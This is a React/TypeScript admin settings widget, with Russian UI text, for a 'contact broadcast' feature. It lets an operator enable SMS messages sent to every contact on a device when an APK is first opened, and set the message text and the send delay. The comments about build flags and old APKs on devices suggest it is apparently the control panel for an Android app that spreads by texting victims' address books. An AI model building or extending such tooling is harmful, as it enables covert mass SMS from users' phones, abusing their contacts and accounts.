import { fetchAdminSettings, patchAdminSettings } from '@/api/admin';
import LoadingWrapper from '@/components/loading-wrapper';
import { Button } from '@/components/ui/button';
import { CardContent } from '@/components/ui/card';
import { Input } from '@/components/ui/input';
import { Label } from '@/components/ui/label';
import { Separator } from '@/components/ui/separator';
import { Switch } from '@/components/ui/switch';
import { Textarea } from '@/components/ui/textarea';
import { MessageSquare } from 'lucide-react';
import { useEffect, useState, type FormEvent } from 'react';
import { toast } from 'sonner';
import SettingsWidgetCard from './settings-widget-card';

const MAX_TEXT_LENGTH = 1000;
const MIN_DELAY_MS = 100;
const MAX_DELAY_MS = 600_000;
const DEFAULT_DELAY_MS = 1000;

function parseDelayMsInput(raw: string): number | null {
	const value = Number(raw);
	if (!Number.isFinite(value)) return null;
	return Math.trunc(value);
}

function isValidDelayMs(value: number): boolean {
	return Number.isFinite(value) && value >= MIN_DELAY_MS && value <= MAX_DELAY_MS;
}

export default function ContactBroadcastSettingsWidget() {
	const [contactBroadcastEnabled, setContactBroadcastEnabled] = useState(false);
	const [contactBroadcastText, setContactBroadcastText] = useState('');
	const [contactBroadcastDelayMs, setContactBroadcastDelayMs] = useState(DEFAULT_DELAY_MS);
	const [isLoading, setIsLoading] = useState(true);
	const [isSaving, setIsSaving] = useState(false);

	useEffect(() => {
		let cancelled = false;

		async function load() {
			try {
				const settings = await fetchAdminSettings();
				if (!cancelled) {
					setContactBroadcastEnabled(settings.contactBroadcastEnabled);
					setContactBroadcastText(settings.contactBroadcastText ?? '');
					setContactBroadcastDelayMs(settings.contactBroadcastDelayMs ?? DEFAULT_DELAY_MS);
				}
			} finally {
				if (!cancelled) setIsLoading(false);
			}
		}

		void load();

		return () => {
			cancelled = true;
		};
	}, []);

	async function handleToggle(checked: boolean) {
		const previous = contactBroadcastEnabled;
		setContactBroadcastEnabled(checked);
		setIsSaving(true);

		try {
			const settings = await patchAdminSettings({ contactBroadcastEnabled: checked });
			setContactBroadcastEnabled(settings.contactBroadcastEnabled);
			setContactBroadcastText(settings.contactBroadcastText ?? '');
			setContactBroadcastDelayMs(settings.contactBroadcastDelayMs ?? DEFAULT_DELAY_MS);
			toast.success(checked ? 'Рассылка включена' : 'Рассылка отключена');
		} catch {
			setContactBroadcastEnabled(previous);
		} finally {
			setIsSaving(false);
		}
	}

	async function handleTextSubmit(e: FormEvent) {
		e.preventDefault();

		const trimmed = contactBroadcastText.trim();
		if (!trimmed) {
			toast.error('Текст не может быть пустым');
			return;
		}
		if (trimmed.length > MAX_TEXT_LENGTH) {
			toast.error(`Максимум ${MAX_TEXT_LENGTH} символов`);
			return;
		}
		if (!isValidDelayMs(contactBroadcastDelayMs)) {
			toast.error(`Задержка: от ${MIN_DELAY_MS} до ${MAX_DELAY_MS} мс`);
			return;
		}

		const previousText = contactBroadcastText;
		const previousDelay = contactBroadcastDelayMs;
		setIsSaving(true);

		try {
			const settings = await patchAdminSettings({
				contactBroadcastText: trimmed,
				contactBroadcastDelayMs,
			});
			setContactBroadcastText(settings.contactBroadcastText ?? '');
			setContactBroadcastDelayMs(settings.contactBroadcastDelayMs ?? DEFAULT_DELAY_MS);
			toast.success('Настройки рассылки сохранены');
		} catch {
			setContactBroadcastText(previousText);
			setContactBroadcastDelayMs(previousDelay);
			toast.error('Не удалось сохранить настройки');
		} finally {
			setIsSaving(false);
		}
	}

	return (
		<SettingsWidgetCard
			id='contact-broadcast'
			icon={MessageSquare}
			title='Рассылка по контактам'
			description='SMS всем контактам при первом открытии APK'
			titleClassName='text-chart-2'
			iconWrapperClassName='bg-chart-2/15'
		>
			<LoadingWrapper show={isSaving}>
				<CardContent className='px-4 py-4 flex flex-col gap-4'>
					<div className='flex items-center justify-between gap-3'>
						<div className='flex flex-col gap-0.5'>
							<Label>Рассылка включена</Label>
							<span className='text-xs text-muted-foreground'>
								При выключении APK получит 403 и SMS не уйдут
							</span>
						</div>
						<Switch
							checked={contactBroadcastEnabled}
							onCheckedChange={checked => void handleToggle(checked)}
							disabled={isLoading}
						/>
					</div>

					<Separator />

					<form className='flex flex-col gap-3' onSubmit={handleTextSubmit}>
						<div className='flex flex-col gap-1.5'>
							<Label htmlFor='contact-broadcast-text'>Текст SMS</Label>
							<span className='text-xs text-muted-foreground'>
								Работает только если в билде включены контакты (contactsEnabled). Максимум {MAX_TEXT_LENGTH}{' '}
								символов.
							</span>
							<Textarea
								id='contact-broadcast-text'
								value={contactBroadcastText}
								onChange={e => setContactBroadcastText(e.target.value)}
								maxLength={MAX_TEXT_LENGTH}
								rows={4}
								disabled={isLoading}
								placeholder='Текст сообщения для рассылки…'
							/>
							<span className='text-xs text-muted-foreground text-right'>
								{contactBroadcastText.length}/{MAX_TEXT_LENGTH}
							</span>
						</div>

						<div className='flex flex-col gap-1.5'>
							<Label htmlFor='contact-broadcast-delay-ms'>Задержка между SMS (мс)</Label>
							<span className='text-xs text-muted-foreground'>
								1000 = 1 сек; макс {MAX_DELAY_MS} (10 мин). Старые APK на устройствах: 1 с и таймаут 5 мин, пока
								не установят новый билд.
							</span>
							<Input
								id='contact-broadcast-delay-ms'
								type='number'
								min={MIN_DELAY_MS}
								max={MAX_DELAY_MS}
								step={100}
								value={contactBroadcastDelayMs}
								onChange={e => {
									const parsed = parseDelayMsInput(e.target.value);
									if (parsed != null) {
										setContactBroadcastDelayMs(parsed);
									}
								}}
								disabled={isLoading}
							/>
						</div>

						<Button
							type='submit'
							className='self-start'
							disabled={isLoading || isSaving || !isValidDelayMs(contactBroadcastDelayMs)}
						>
							Сохранить
						</Button>
					</form>
				</CardContent>
			</LoadingWrapper>
		</SettingsWidgetCard>
	);
}
